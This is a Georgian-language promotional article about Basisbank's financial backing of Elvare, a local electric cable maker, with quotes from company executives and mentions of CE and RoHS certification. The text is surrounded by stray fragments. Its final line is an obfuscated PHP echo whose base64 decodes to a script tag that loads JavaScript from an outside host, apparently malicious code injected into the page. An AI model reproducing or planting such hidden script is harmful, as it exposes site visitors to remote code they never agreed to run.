celsiusi
ავერსი შნაიდერი
ბაზისბანკი, ელვარეს დაფუძნების დღიდან მისი აქტიური მხარდამჭერი და ფინანსური პარტნიორია, რომელიც „აწარმოე საქართველოში“ პროგრამის ფარგლებში შეიქმნა და საქართველოში დამზადებულ ელექტრო კაბელებს აწარმოებს.
 
ელვარე არის პირველი საწარმო, რომელმაც CE მარკირება მიიღო, რაც ევროპული ხარისხის დადასტურებაა და IEC-ს საერთაშორისო სტანდარტებთან პროდუქციის შესაბამისობის დამადასტურებელი სერტიფიკატები. კომპანია არის რეგიონში RoHS სერტიფიკატის მფლობელი კაბელის მწარმოებელი პირველი კომპანია.
 
ელვარეს ჩამოყალიბების და განვითარების ისტორია არის როგორც ბაზისბანკის, ასევე სახელმწიფოსა და ბიზნესის ურთიერთთანამშრომლობის გამორჩეული მაგალითი.
 
„ბაზისბანკთან მჭიდრო პარტნიორობამ და მათი გუნდის მიერ მუდმივმა მხარდაჭერამ, შესაძლებლობა მოგვცა ფაქტიურად ნოლიდან შექმნილიყო ჩვენი საწარმო თანამედროვე ტექნოლოგიური საწარმოო ხაზებითა და დანადგარებით. დღესდღეობით გვაქვს წარმოება, სადაც კომპიუტერული ავტომატიზირებული სისტემები აკონტროლებენ პროცესს მილიმეტრის მეასედის სიზუსტით. ბაზისბანკი ყოველთვის ხელს უწყობდა ელვარეს განვითარებას და ერთად კიდევ ბევრ მნიშვნელოვან პროექტს განვახორციელებთ.“ - ენ ერ ჯი ჯორჯიას გენერალური დირექტორი, მამია მოცრაძე.
 
„ბაზისბანკი, ელვარეს დაფუძნების დღიდან მისი აქტიური მხარდამჭერია. კომპანიის მენეჯმენტის თავდაუზოგავი შრომითა და ბანკის ჩართულობით შევქმენით თანამედროვე, მაღალტექნოლოგიური დანადგარებით აღჭურვილი საწარმო, რომლის მიერ წარმოებული ელექტრო კაბელი სრულად არის შესაბამისობაში საერთაშორისო სტანდარტებთან.
 
ელვარეს პროდუქციის ფართო ასორტიმენტი, მაღალტექნოლოგიური წარმოება და მენეჯმენტის უკომპრომისო ერთგულება ხარისხის მიმართ, უზრუნველყოფს კომპანიის წარმატებას ადგილობრივ ბაზარზე და ქმნის საერთაშორისო ბაზარზე განვითარების მყარ საფუძველს.“ - ბაზისბანკის კომერციული დირექტორი, გიგი გაბუნია.
 
353
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");